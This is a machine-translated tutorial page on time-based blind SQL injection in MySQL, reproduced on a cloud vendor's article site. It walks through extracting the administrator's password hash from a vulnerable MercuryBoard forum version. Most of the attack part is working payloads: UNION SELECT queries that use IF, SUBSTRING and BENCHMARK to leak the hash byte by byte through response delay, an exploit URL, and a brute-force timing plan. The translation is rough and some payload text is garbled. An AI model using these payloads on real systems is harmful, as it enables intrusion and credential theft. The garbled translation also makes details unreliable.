Home > Cloud Computing > Cloud Security

MySQL database blind Injection Technology

Source: Internet
Author: User
Tags md5 hash perl script
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Author: Zeelock
Author: Floating Dust [S.S. T] (www.cnsst.net)

Note: the author of the translation owns the copyright of the Chinese version of this article. The Script Security team started this article and submitted it to the information security team, copyright to the script security team and floating dust [S.S. t] copyright.

Keywords: Benchmark (), IF (), "Blind Injection", "Time Delay", waitfor

"Validate anything can be passed. Security lays in the inputs."-zk
All Filters may be broken through. Security depends on input. -Zk

Abstract:
It is not easy to use SQL Injection for MySQL Databases: when UNION appears in two different types of data columns, there is no way
You can query the displayed errors from the parameters passed in the query. When we review the php/MySQL application code, we find an Injection Vulnerability
Is not available. This has seen many times, because we cannot see the output result before the script ends or all of the information we see is an error message, the values found are passed to multiple queries through different lists.
For this reason, using SELECT... UNION is not enough.


Injection tool box
When there is no error message, a common injection always uses union select [null, null,... to check the number in the correct column selected in the previous selection,
So we can go deeper. If no output result is displayed, it is almost impossible to obtain the content even if we know the name of each column in each table accurately.

Here is an example of a vulnerability that cannot be exploited in the MercuryBoard discovered by codebug.org. I will demonstrate step by step how to locate the password hash from the vulnerability that is discovered in the quilt.
I suppose the table name is known. (It is a normal assumption that an open script resource is being reviewed, or that the default debugging option is active or not)

Vulnerabilities
MercuryBoard v. 1.1.0 the error message returned when the post. php contains an SQL injection vulnerability that is set to reply and the parameter t is passed.
When a user logs in to perform the following operations, an error will occur:
Http://www.site.com/mercuryboard... amp; s = reply & t = 1
This result seems to be unusable.

Prepare for blindness
First, use a user with low database permissions to install the vulnerable Mercuryboard version.

| --- | Database Name: mercuryboard | --- | (display the table name)

Mysql> show tables;
+ ------------------- +
| Tables_in_mercury |
+ ------------------- +
| Mb_active |
| Mb_attach |
| Mb_forums |
| Mb_groups |
| Mb_help |
| Mb_logs |
| Mb_membertitles |
| Mb_pmsystem |
| Mb_posts |
| Mb_replacements |
| Mb_settings |
| Mb_skins |
| Mb_subscriptions |
| Mb_templates |
| Mb_topics |
| Mb_users |
| Mb_votes |
+ ------------------- +
17 rows in set (0.00 sec)

| --- | The current user you see is a normal user | --- | (not run as root)
Mysql> select user ();
+ --------------- +
| USER () |
+ --------------- +
| 123 @ localhost |
+ --------------- +
1 row in set (0.00 sec)

Mysql> SELECT password, USER () FROM mysql. user;
ERROR 1142: select command denied to user: 123 @ localhost for table user
Mysql>

| --- | The following query displays the first byte of the Administrator hash | --- |

Mysql> select substring (user_password, 1, 1) FROM mb_users WHERE user_group = 1;
+ ------------------------------ +
| SUBSTRING (user_password, 1, 1) |
+ ------------------------------ +
| 5 |
+ ------------------------------ +
1 row in set (0.00 sec)

| --- | The first ASCII byte hashed by the Administrator is shown below | --- |

Mysql> select ascii (5 );
+ ------------ +
| ASCII (5) |
+ ------------ +
| 53 |
+ ------------ +
1 row in set (0.00 sec)

Differences
The goal is to find a method that is recommended in some way, so that the content we are looking for is correct. How can I know the first hash of the administrator?
Is the byte equal to 5? In The NGSS data, if the content matches the injection, the author will simply delay the query. In mssql, this will use a condition
IF [QUERY] waitfor [TIME] to append, mysql does not support waitfor.

In the following query, I successfully used the IF () function to follow a BENCHMARK () function to create a latency of 5 seconds. The current user can use low Permissions
Execute (if you can SELECT, You can execute the BENCHMARK () function ).

| --- | Pass an incorrect number | --- | (CHAR (52) is equal to 4)

Mysql> Select active_id FROM mb_active union select if (SUBSTRING (user_password, 1
, 1) = CHAR (52), BENCHMARK (5000000, ENCODE (Slow Down, by 5 seconds), null) FROM
Mb_users WHERE user_group = 1;
+ ----------- +
| Active_id |
+ ----------- +
| 3 |
| 0 |
+ ----------- +
2 rows in set (0.00 sec)

In the previous example, the BENCHMARK () function was not executed
0.00 sec ).)

| --- | Pass Matching content | --- | (BENCHMARK () is executed)

Mysql> Select active_id FROM mb_active union select if (SUBSTRING (user_password, 1
, 1) = CHAR (53), BENCHMARK (5000000, ENCODE (Slow Down, by 5 seconds), null) FROM
Mb_users WHERE user_group = 1;
+ ----------- +
| Active_id |
+ ----------- +
| 3 |
| 0 |
+ ----------- +
2 rows in set (5.36 sec)

In the previous example, the BENCHMARK () function has a latency of 5.36 s.

Fix GET req
To successfully inject SQL commands, we have to clear any single echo request.


| --- | Clear echo | --- |

Mysql> Select active_id FROM mb_active union select if (SUBSTRING (user_password, 1
, 1) = CHAR (53), BENCHMARK (1000000, MD5 (CHAR (1), null) FROM mb_users WHERE user_gr
Oup = 1;
+ ----------- +
| Active_id |
+ ----------- +
| 3 |
| 0 |
+ ----------- +
2 rows in set (4.65 sec)

Mysql>

Vulnerability Exploitation
First, you must log on to a registered user.
Http: // 127.0.0.1/mercuryboard/in... UNION % 20 SELECT % 20IF
(SUBSTRING (user_password, 1000000) % 20 = % 20 CHAR (53), BENCHMARK (, MD5 (CHAR (1 ))),
Null), null % 20 FROM % 20mb_users % 20 WHERE % 20user_group % 20 = % 201 /*

We can see that the first byte is CHAR (53), 5 as a result of 2 seconds.

Brute force cracking
It is necessary to recreate the content with one letter and one letter. Only a simple perl script executes the GET request and waits for one byte and one byte.
{. SUBSTRING (strn, [, 3. n], 1)...}. If the response is delayed for 7-10 seconds, we have the right to fill it. Brute force cracking
The MD5 hash value is 32 bytes.

0 to 9 --> ASCII 48 to 57
A to z --> ASCII 97 to 122

The worst result is 36 requests. 3 seconds for each request and latency are the correct bytes. The complete hash (3*35) + 10) is obtained) * 32 = 3622 seconds (1 hour)

Conclusion
Mysql can be blinded.

Original English:
Blind Injection in MySQL Databases
Html> http://forum.eviloctal.com/read-htm-tid-8313.html

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
mysql blind sql injection blind sql injection tutorial blind sql injection cheat sheet blind sql injection attack example how to prevent blind sql injection how to fix blind sql injection database injection
Related Article
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More